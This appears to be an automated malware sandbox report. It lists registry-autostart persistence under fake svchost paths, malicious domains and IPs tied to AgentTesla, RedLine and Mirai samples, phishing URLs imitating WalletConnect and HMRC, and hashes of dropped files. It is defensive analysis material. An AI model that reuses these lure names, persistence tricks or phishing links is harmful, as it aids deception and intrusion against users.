                                                                                                                                                                                                                                        07:09:07Task SchedulerRun new task: espartu.exe path: C:\Users\user\AppData\Local\Temp\110000000011111\espartu.exe
                                                                                                                                                                                                                                        07:09:14AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\RunOnce espartu.exe C:\Users\user\AppData\Local\Temp\110000000011111\espartu.exe
                                                                                                                                                                                                                                        07:09:27AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run svchost "C:\ProgramData\FRaqbC8wSA1XvpFVjCRGryWt.exe"
                                                                                                                                                                                                                                        07:09:35AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run svchost "C:\Users\user\AppData\Roaming\Microsoft Windows\svchost.exe"
                                                                                                                                                                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                                        31.170.22.127INVOICE087667899.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                        • heygirlisheeverythingyouwantedinaman.comheygirlisheeverythingyouwantedinaman.com:443
                                                                                                                                                                                                                                        RDFchOT4i0.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                        • artemis-rat.comartemis-rat.com:443
                                                                                                                                                                                                                                        063837646WAYBILLMAR24.exeGet hashmaliciousRedLineBrowse
                                                                                                                                                                                                                                        • artemis-rat.comartemis-rat.com:443
                                                                                                                                                                                                                                        PO23656PDFF.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                                                                                                        • artemis-rat.comartemis-rat.com:443
                                                                                                                                                                                                                                        SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                                                                                                        • artemis-rat.comartemis-rat.com:443
                                                                                                                                                                                                                                        dl7WL77rkA.exeGet hashmaliciousGlupteba, Mars Stealer, Stealc, VidarBrowse
                                                                                                                                                                                                                                        • artemis-rat.comartemis-rat.com:443
                                                                                                                                                                                                                                        hesaphareketi-01.pdf.exeGet hashmaliciousVector StealerBrowse
                                                                                                                                                                                                                                        • artemis-rat.comartemis-rat.com:443
                                                                                                                                                                                                                                        hesaphareketi-01.pdf.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                        • artemis-rat.comartemis-rat.com:443
                                                                                                                                                                                                                                        DHL shipment arrival.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                                                                                                        • artemis-rat.comartemis-rat.com:443
                                                                                                                                                                                                                                        Document 9404658918890577081119475750-pdf.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                                                                                                        • artemis-rat.comartemis-rat.com:443
                                                                                                                                                                                                                                        184.178.172.5RDFchOT4i0.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                        • artemis-rat.comartemis-rat.com:443
                                                                                                                                                                                                                                        SecuriteInfo.com.Trojan.DownLoaderNET.943.16578.26938.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                        • artemis-rat.comartemis-rat.com:443
                                                                                                                                                                                                                                        DHL EXPRESS.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                                                                                                        • artemis-rat.comartemis-rat.com:443
                                                                                                                                                                                                                                        Kazeem Engineering and Technical Services.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                                                                                                        • heygirlisheeverythingyouwantedinaman.comheygirlisheeverythingyouwantedinaman.com:443
                                                                                                                                                                                                                                        POs#U034fx#U034fl#U034fx#U034f..exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                                                                                                        • heygirlisheeverythingyouwantedinaman.comheygirlisheeverythingyouwantedinaman.com:443
                                                                                                                                                                                                                                        PO-065-01-2024E-2.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                                                                                                        • heygirlisheeverythingyouwantedinaman.comheygirlisheeverythingyouwantedinaman.com:443
                                                                                                                                                                                                                                        New Orders#U034fx#U034fl#U034fx#U034f..exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                                                                                                        • artemis-rat.comartemis-rat.com:443
                                                                                                                                                                                                                                        Payment Invoice.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                                                                                                        • artemis-rat.comartemis-rat.com:443
                                                                                                                                                                                                                                        PAYMENT.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                                                                                                        • artemis-rat.comartemis-rat.com:443
                                                                                                                                                                                                                                        DHL DETAILS.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                                                                                                        • artemis-rat.comartemis-rat.com:443
                                                                                                                                                                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                                        tmpfiles.orgKMPrEVaSfH.exeGet hashmaliciousLummaC, Babuk, Djvu, LummaC Stealer, PureLog Stealer, RedLine, SmokeLoaderBrowse
                                                                                                                                                                                                                                        • 104.21.21.16
                                                                                                                                                                                                                                        SecuriteInfo.com.Win32.PWSX-gen.24221.17365.exeGet hashmaliciousAmadey, RedLine, RisePro StealerBrowse
                                                                                                                                                                                                                                        • 104.21.21.16
                                                                                                                                                                                                                                        New_Text_Document_mod.exse.exeGet hashmaliciousAgentTesla, Amadey, Creal Stealer, Djvu, FormBook, Glupteba, GuLoaderBrowse
                                                                                                                                                                                                                                        • 104.21.21.16
                                                                                                                                                                                                                                        https://aeindo.co.id/cvt/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                        • 104.21.21.16
                                                                                                                                                                                                                                        https://pmb.stitmakrifatulilmi.ac.id/scv/Get hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                                                        • 172.67.195.247
                                                                                                                                                                                                                                        https://central-lab.by/rstc/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                        • 172.67.195.247
                                                                                                                                                                                                                                        https://kurindubaitullah.com/lpwx00Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                        • 104.21.21.16
                                                                                                                                                                                                                                        doc0987654321u.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                        • 104.21.21.16
                                                                                                                                                                                                                                        starter.shGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                        • 104.21.21.16
                                                                                                                                                                                                                                        bflow-musico.funSecuriteInfo.com.FileRepMalware.25938.2401.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                        • 188.114.97.3
                                                                                                                                                                                                                                        SecuriteInfo.com.FileRepMalware.25938.2401.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                        • 188.114.96.3
                                                                                                                                                                                                                                        7qRAdqzglF.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                        • 188.114.97.3
                                                                                                                                                                                                                                        7qRAdqzglF.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                        • 188.114.96.3
                                                                                                                                                                                                                                        CNqG8pdNEt.exeGet hashmaliciousXFiles StealerBrowse
                                                                                                                                                                                                                                        • 172.67.141.68
                                                                                                                                                                                                                                        BVPnNKMEXh.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                        • 172.67.141.68
                                                                                                                                                                                                                                        file.exeGet hashmaliciousXFiles StealerBrowse
                                                                                                                                                                                                                                        • 172.67.141.68
                                                                                                                                                                                                                                        file.exeGet hashmaliciousXFiles StealerBrowse
                                                                                                                                                                                                                                        • 172.67.141.68
                                                                                                                                                                                                                                        bg.microsoft.map.fastly.nethttp://my-site-101974-102059.weeblysite.com/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                        • 199.232.214.172
                                                                                                                                                                                                                                        https://hm-revenue-customs_income_tax-enquiries-668d3b1e91ce1.smartaromas.com/income-individual_service_tax-gg-check-hm/applyClaim.phpGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                        • 199.232.210.172
                                                                                                                                                                                                                                        http://meettamaskk-loggiin.gitbook.io/usaGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                        • 199.232.210.172
                                                                                                                                                                                                                                        https://pub-9ebdc9c3bd854ec3927f8701047f2468.r2.dev/secure.htmlGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                                                        • 199.232.214.172
                                                                                                                                                                                                                                        http://frejuslangevin1234.wixsite.com/mesagerie-vocalGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                        • 199.232.210.172
                                                                                                                                                                                                                                        https://cw08037.tw1.ru/oro/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                        • 199.232.214.172
                                                                                                                                                                                                                                        https://dev-651454514514.pantheonsite.io/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                        • 199.232.210.172
                                                                                                                                                                                                                                        https://dev-79794988.pantheonsite.io/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                        • 199.232.210.172
                                                                                                                                                                                                                                        http://www.veathika.com/cgi-bin/june.phpGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                                                        • 199.232.214.172
                                                                                                                                                                                                                                        https://pub-3bc8a1a44abe443d986ec9d918803f0b.r2.dev/hjkoped.htmlGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                        • 199.232.214.172
                                                                                                                                                                                                                                        api.proxyscrape.comUrQrIdRfCg.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                        • 104.18.11.5
                                                                                                                                                                                                                                        UrQrIdRfCg.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                        • 104.18.10.5
                                                                                                                                                                                                                                        UrQrIdRfCg.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                        • 104.18.10.5
                                                                                                                                                                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                                        NANO-ASLVTYxryaQOKO.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                                                        • 86.63.174.254
                                                                                                                                                                                                                                        w69QLZ61Kq.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                                                        • 83.241.94.59
                                                                                                                                                                                                                                        INVOICE087667899.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                        • 31.170.22.127
                                                                                                                                                                                                                                        RDFchOT4i0.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                        • 31.170.22.127
                                                                                                                                                                                                                                        bUuAPqXmkL.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                                                        • 83.241.94.23
                                                                                                                                                                                                                                        XIu2eKNZ8m.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                                                        • 83.241.71.111
                                                                                                                                                                                                                                        UksgYUGMnj.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                                                        • 83.241.69.92
                                                                                                                                                                                                                                        35YUJoJHtk.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                                                        • 83.241.94.83
                                                                                                                                                                                                                                        You've Been Sent A Secure Document.emlGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                                                        • 5.44.220.14
                                                                                                                                                                                                                                        wbHziCLDIg.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                                                        • 83.241.94.26
                                                                                                                                                                                                                                        CELLCOUSjew.m68k.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                        • 72.110.131.103
                                                                                                                                                                                                                                        jew.mpsl.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                                                        • 97.25.60.241
                                                                                                                                                                                                                                        jew.ppc.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                                                        • 174.225.164.143
                                                                                                                                                                                                                                        jew.spc.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                                                        • 97.7.148.173
                                                                                                                                                                                                                                        jew.x86.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                                                        • 75.236.196.181
                                                                                                                                                                                                                                        sora.arm7.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                                                        • 174.194.130.1
                                                                                                                                                                                                                                        sora.spc.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                                                        • 70.220.119.21
                                                                                                                                                                                                                                        gw3yTM2uiZ.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                                                        • 166.250.246.180
                                                                                                                                                                                                                                        zisD7MC388.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                                                        • 174.39.23.54
                                                                                                                                                                                                                                        AMAZON-AESUSMemo98767_innocap.com.htmGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                                                        • 34.195.158.27
                                                                                                                                                                                                                                        http://my-site-101974-102059.weeblysite.com/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                        • 3.228.185.195
                                                                                                                                                                                                                                        https://parthsharma13.github.io/netflixcloneusingtailwindGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                        • 54.145.90.155
                                                                                                                                                                                                                                        http://frejuslangevin1234.wixsite.com/mesagerie-vocalGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                        • 184.73.73.222
                                                                                                                                                                                                                                        https://home-wlletconnect.gitbook.io/usGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                        • 34.202.12.162
                                                                                                                                                                                                                                        http://notifyhubss.net/4d98cfdadudd0c4222l8ec2903al2ea071e2.html__Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                        • 52.86.190.19
                                                                                                                                                                                                                                        https://walletconnect--safe.gitbook.io/usGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                        • 3.217.26.44
                                                                                                                                                                                                                                        https://walletconnect--safe.gitbook.io/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                        • 18.208.66.98
                                                                                                                                                                                                                                        https://app-walletconnect.gitbook.io/usGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                        • 107.21.30.162
                                                                                                                                                                                                                                        https://wallt--connt--cnect.gitbook.io/usGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                        • 44.194.34.219
                                                                                                                                                                                                                                        ASNLSKZContract 2024-2.pdfGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                                                        • 185.97.113.74
                                                                                                                                                                                                                                        240506-b7lv1sfmcw_pw_infected.zipGet hashmaliciousXmrigBrowse
                                                                                                                                                                                                                                        • 5.188.64.229
                                                                                                                                                                                                                                        phish_alert_sp2_2.0.0.0 (14).emlGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                                                        • 185.97.113.74
                                                                                                                                                                                                                                        https://tanauto.kz/?url=//Rgfstaffing%25E3%2580%2582energycomercio%25E3%2580%2582com%25E3%2580%2582br%2Fomluabie%2Fomowunmis%2FRgfstaffing4i4h7siub%2Fcm9iLnphbmRiZXJnZW5Acmdmc3RhZmZpbmcuY29tGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                        • 185.97.113.74
                                                                                                                                                                                                                                        most-x86_64.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                                                        • 79.143.20.108
                                                                                                                                                                                                                                        h3fEC40gwe.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                        • 87.255.198.179
                                                                                                                                                                                                                                        https://tanauto.kz/?url=https://woolyx.com/wp-content/auth/milestoneaviation.com/rfarnese@milestoneaviation.comGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                                                        • 185.97.113.74
                                                                                                                                                                                                                                        BKrGUEtpSQ.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                                                        • 93.190.241.121
                                                                                                                                                                                                                                        qvV34ruRr1.exeGet hashmaliciousWannacryBrowse
                                                                                                                                                                                                                                        • 93.190.241.254
                                                                                                                                                                                                                                        assailant.i586Get hashmaliciousMiraiBrowse
                                                                                                                                                                                                                                        • 79.143.22.217
                                                                                                                                                                                                                                        No context
                                                                                                                                                                                                                                        No context
                                                                                                                                                                                                                                        Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                        File Type:Extensible storage engine DataBase, version 0x620, checksum 0x648b6c5e, page size 16384, Windows version 10.0
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):1310720
                                                                                                                                                                                                                                        Entropy (8bit):0.6584428517915629
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:1536:xSB2ESB2SSjlK/AxrO1T1B0CZSJWYkr3g16n2UPkLk+kdbI/0uznv0M1Dn/didMV:xaza6xhzA2U8HDnAPZ4PZf9h/9h
                                                                                                                                                                                                                                        MD5:6401C545FECD8FB8B80D2CD690AF3510
                                                                                                                                                                                                                                        SHA1:9108AE3A150A290803D32E258C7DC8900A0F9A75
                                                                                                                                                                                                                                        SHA-256:BB0B03A1D21FEA13F16D1650249DCBC164B560C566829C301C93D9E27FB60425
                                                                                                                                                                                                                                        SHA-512:40FDF3399987A4F5C1D9832509A0131AF249493407EB2156F5011215920FC7C72B51D283C01093936819FD36AFE1A7A5CAE5DDD0A02C419D204B0BEB807C2F8A
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:d.l^... ...............X\...;...{......................T.~..........|u......|!.h.|..........|u.T.~.........D./..;...{..........................................................................................................eJ......n....@...................................................................................................... ............................................................................................................................................................................................................2...{................................../.q......|u....................4.....|u..........................#......T.~.....................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                        Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                        File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):65536
                                                                                                                                                                                                                                        Entropy (8bit):0.7159435232577396
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:96:dvCFx6x0yYsD9hq4Df7qdfHQXIDcQIc6XibcEtmcw3tLx71z+HbHg/8BRTf3Oy1J:kmVYHzS0W2bONojuGzuiFsZ24IO8K
                                                                                                                                                                                                                                        MD5:CBEB871175BAEF6EB0232BEB3A54CAB6
                                                                                                                                                                                                                                        SHA1:7C7DAC5AC70E4B70E167369570686C0FA63A1B64
                                                                                                                                                                                                                                        SHA-256:74EC183CA29F8D1AD6E90A5D15A1048B224E63F697420D65CDDA54130FD01612
                                                                                                                                                                                                                                        SHA-512:DEA62AFB0DA94EC8C3215F483BD949DFF00F8D521B718BA49F97D1F23B21EDFFB6EE1DE396043A72502E1A041C33AAB56FC4D5A7A97F4EF182658B1593FB6AF0
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.6.5.3.2.0.7.6.4.5.4.5.9.7.8.2.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.6.5.3.2.0.7.6.5.2.8.0.3.4.8.4.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.f.7.9.4.8.2.d.a.-.6.f.3.8.-.4.2.4.e.-.b.9.5.d.-.1.4.9.1.9.b.5.f.c.8.c.e.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.f.7.5.e.6.b.6.0.-.f.0.3.4.-.4.3.b.2.-.9.1.d.d.-.0.3.f.1.2.8.a.9.7.1.0.2.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.l.e.g.2.2.2...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.9.4.8.-.0.0.0.1.-.0.0.1.4.-.a.0.2.9.-.d.0.5.b.e.2.d.4.d.a.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.5.d.e.4.5.2.2.b.e.1.4.1.7.0.6.9.d.4.6.f.6.c.c.1.7.f.c.6.1.d.2.e.0.0.0.0.f.f.f.f.!.0.0.0.0.3.7.9.f.7.b.0.9.5.7.5.1.1.1.6.c.9.a.6.c.5.6.d.0.9.4.5.c.a.1.2.a.e.1.2.2.d.2.5.3.!.l.e.g.2.2.2...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.2.4.
                                                                                                                                                                                                                                        Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                        File Type:Mini DuMP crash report, 14 streams, Sat Jul 13 05:06:04 2024, 0x1205a4 type
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):55392
                                                                                                                                                                                                                                        Entropy (8bit):1.7870994893615402
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:192:rCA9hAUOP93RA2+3vLw2plK/yIPH3xIJvn4Uyi7RfTFmG:mIAVRA2AvLw2plK/lmnVy2RrFN
                                                                                                                                                                                                                                        MD5:867E6D6FFA67A232A5E1FECC188789D8
                                                                                                                                                                                                                                        SHA1:7C699C5B9547B06C10F73BB4F6463088BA1295F7
                                                                                                                                                                                                                                        SHA-256:4BB20EBFB1D53DBD21FB2D71F3947372C341D500902FCDD74B72A520C4AF6C9D
                                                                                                                                                                                                                                        SHA-512:1BF94B29332F0BE7BDD145AA359EDDB5D83110F785DECDD6E901DDF88046E0F30B34028B33FF5B3CA713D17606665FFEB8E38EB5D383D0A11750B9A4CB2C045E
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MDMP..a..... .......<..f........................0...........D...f$..........T.......8...........T...............p...........,...........................................................................................eJ..............GenuineIntel............T.......H...:..f.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                        Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                        File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):8260
                                                                                                                                                                                                                                        Entropy (8bit):3.6857267546612413
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:192:R6l7wVeJ6a6H86YpQ6QGxMWgmfSqoODpDT89b8lsfMUm:R6lXJH6c6Yu63xMWgmfSqoOi8+fW
                                                                                                                                                                                                                                        MD5:28398434CB9708E37F16477045088AB3
                                                                                                                                                                                                                                        SHA1:885F24C9674F2841BA6B666D2B451312152DAB71
                                                                                                                                                                                                                                        SHA-256:FD574F1C4BD6DAFFB3DC68F4689FA9ED4EF52C23E7FC9550D5C1A5DB7848A1BB
                                                                                                                                                                                                                                        SHA-512:9F842CF9200DCF15F0DF3ADE6E30C65B86DB7CDAED8DDD5B8E4EBE62FCCA896B7714C58580156C418935FC1E4DDB59C846CCCE3DD51AA0D24245EF2B59A062C7
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.6.4.7.2.<./.P.i.
                                                                                                                                                                                                                                        Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                        File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):4551
                                                                                                                                                                                                                                        Entropy (8bit):4.422125811612238
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:48:cvIwWl8zs5Jg77aI9cHWpW8VYAYm8M4JSHFXo+q8YidU8w+2d:uIjfLI7a27VsJaokdUJ+2d
                                                                                                                                                                                                                                        MD5:6E4A9217F97C3AB3777B41823CCF9ABA
                                                                                                                                                                                                                                        SHA1:C971B348952C98238343B2DCB17F95F26F589588
                                                                                                                                                                                                                                        SHA-256:F342676575B5B97BC25E26E17425C89BF27AB1E6C270CFD90C4AED4F8B6F4D80
                                                                                                                                                                                                                                        SHA-512:522E96B16132E7A027B025A74961088C5A22C8CC91DC88BAC32D51E6CAAA91100307B6457BE21DCD3E8518084818724C77FB5A9A853A03B843609C1CDC77B5EA
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="408728" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                                                                                                                                                                                                                                        Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):81416
                                                                                                                                                                                                                                        Entropy (8bit):3.086875435011913
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:768:aOcs0QqlRkCQFxTD+nPpLFKk2ScURpw/s75J26U5+RSkpzzDYk:1csBOsFepRPlcgpwEy6UgRXpzfYk
                                                                                                                                                                                                                                        MD5:E543233888DB495DA6FE95FD40C52ECA
                                                                                                                                                                                                                                        SHA1:14F9D9A28BAFF6B5A518D7E199E4FBE05D639EF0
                                                                                                                                                                                                                                        SHA-256:921E702F7D28197B9E9A4B8566581B1A486665C2CF14E726138A96BC83CAB6E9
                                                                                                                                                                                                                                        SHA-512:0D74B64FBDEAB0C4887D83134DA1E2AF3049DCAAE25537D95727F4FBBBEED519F6C8C5AF33F84B625228118C8DD3881C39BC8B2ACDECB4848E4A2732D3FDB4B5
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
